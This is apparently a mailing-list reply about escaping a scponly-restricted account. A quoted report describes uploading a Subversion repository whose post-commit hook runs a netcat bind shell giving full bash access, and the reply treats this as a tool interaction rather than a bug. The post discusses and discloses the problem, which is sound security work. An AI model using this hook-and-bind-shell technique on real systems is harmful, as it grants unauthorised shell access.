* Joachim Breitner: > messing around with some friends here, I tried to access his computer > with only a scponly protected account. I discovered this way of gaining > full shell access: > > I locally created a subversion repository /tmp/blubb with > a /tmp/blubb/hooks/post-commit that contains the command: > ( nc -l -p 1042 -e /bin/bash) &
This is an unfortunate interaction between scponly and Subversion, but not a real bug in any of the programs. The same problem arises when a scponly-restricted user uploads any form of executable contents. CGI scripts are more common (and their so-called "PHP shells" which are explicitly designed to exploit this). -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
